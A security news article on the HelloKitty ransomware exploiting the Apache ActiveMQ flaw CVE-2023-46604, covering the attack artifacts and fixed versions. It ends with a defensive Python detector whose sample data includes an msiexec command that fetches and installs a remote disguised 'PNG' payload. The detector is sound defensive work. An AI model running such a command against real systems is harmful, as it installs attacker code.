The HelloKitty ransomware operation is exploiting a recently disclosed Apache ActiveMQ remote code execution (RCE) flaw to breach networks and encrypt devices.
The flaw, tracked as CVE-2023-46604, is a critical-severity (CVSS v3 score: 10.0) RCE allowing attackers to execute arbitrary shell commands by exploiting the serialized class types in the OpenWire protocol.
The security problem was addressed in a security update on October 25, 2023. However, threat monitoring service ShadowServer reported that, as of October 30, there were still 3,329 internet-exposed servers running a version vulnerable to exploitation.
Yesterday, Rapid7 reported that it had seen at least two distinct cases of threat actors exploiting CVE-2023-46604 in customer environments to deploy HelloKitty ransomware binaries and extort the targeted organizations.
HelloKitty is a ransomware operation that launched in November 2020 and recently had its source code leaked on a Russian-speaking cybercrime forum, making it available to anyone.
The attacks observed by Rapid7 started on October 27, two days after Apache released the security bulletin and fixes, so this appears to be a case of n-day exploitation.
Rapid7 analyzed two MSI files disguised as PNG images, fetched from a suspicious domain, and found that they contain a .NET executable that loads a base64-encoded .NET DLL named EncDLL.
EncDLL is responsible for searching for and stopping specific processes, encrypting files with the RSACryptoServiceProvider function, and appending a “.locked” extension to them.
Some artifacts left behind by these attacks include:
- Java.exe running with an Apache application as the parent process, which is atypical.
- Loading of remote binaries named M2.png and M4.png via MSIExec, indicative of malicious activity.
- Repeated, failed attempts to encrypt files, signaling clumsy exploitation efforts.
- Log entries in activemq.log showing warnings about transport connections failing due to an aborted connection, which may suggest exploitation.
- Presence of files or network communications associated with the HelloKitty ransomware, identifiable by specific domains and file hashes.
The Rapid7 report contains information about the latest HelloKitty indicators of compromise, but more comprehensive data on that front can be found in this FBI report focused on the ransomware family.
The latest ShadowServer stats show that there are still thousands of vulnerable ActiveMQ instances out there, so administrators are urged to apply the available security updates as soon as possible.
Vulnerable versions range from 5.15 to 5.18, including Legacy OpenWire Module versions, and are fixed in versions 5.15.16, 5.16.7, 5.17.6, and 5.18.3.
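As an added defender's example (not Rapid7's, Apache's, or the article's own code), the script below turns two of the points above into checks: it classifies an ActiveMQ version against the fix releases listed here, and it flags the MSIExec-fetched "PNG" and the activemq.log transport warnings named in the artifact list. The sample command lines and log lines are constructed to resemble those artifacts, and the IP addresses in them are documentation ranges, not indicators from the report.

```python
import re

# Fix releases named in the article, keyed by minor line. A version in one of these
# lines that is older than its fix is treated as vulnerable to CVE-2023-46604.
FIXED_RELEASES = {
    (5, 15): (5, 15, 16),
    (5, 16): (5, 16, 7),
    (5, 17): (5, 17, 6),
    (5, 18): (5, 18, 3),
}

def parse_version(text: str) -> tuple:
    return tuple(int(p) for p in text.strip().split("."))

def activemq_status(version: str) -> str:
    """Return 'vulnerable', 'fixed', or 'unassessed' (a line the article does not cover)."""
    v = parse_version(version)
    fix = FIXED_RELEASES.get(v[:2])
    if fix is None:
        return "unassessed"
    return "fixed" if v >= fix else "vulnerable"

# Artifact: msiexec loading a remote binary that is named like a PNG image.
REMOTE_PNG_MSI = re.compile(r"\bmsiexec(?:\.exe)?\b.*\bhttps?://\S+\.png\b", re.IGNORECASE)
# Artifact: activemq.log WARN entries about a transport connection failing on an aborted connection.
TRANSPORT_WARN = re.compile(r"\bWARN\b.*Transport Connection to: \S+ failed.*aborted", re.IGNORECASE)

def suspicious_cmdlines(cmdlines):
    """Process command lines worth triage (msiexec pulling a remote .png)."""
    return [c for c in cmdlines if REMOTE_PNG_MSI.search(c)]

def suspicious_log_lines(log_lines):
    """activemq.log lines matching the aborted-transport-connection warning pattern."""
    return [line for line in log_lines if TRANSPORT_WARN.search(line)]

if __name__ == "__main__":
    # Constructed samples: one command line mirroring the M2.png artifact, one benign install.
    cmds = [
        r"msiexec /q /i http://203.0.113.7/M2.png",
        r"msiexec /i C:\Installers\vendor.msi",
    ]
    # Constructed log lines in the ActiveMQ log layout; the first mimics the described warning.
    log = [
        "2023-10-27 02:11:03,114 | WARN  | Transport Connection to: tcp://198.51.100.9:51234 failed: "
        "java.io.IOException: An established connection was aborted | org.apache.activemq.broker.TransportConnection.Transport | ActiveMQ Transport",
        "2023-10-27 02:11:04,001 | INFO  | Apache ActiveMQ 5.15.15 started | org.apache.activemq.broker.BrokerService | main",
    ]
    print(activemq_status("5.15.15"), suspicious_cmdlines(cmds), suspicious_log_lines(log))
```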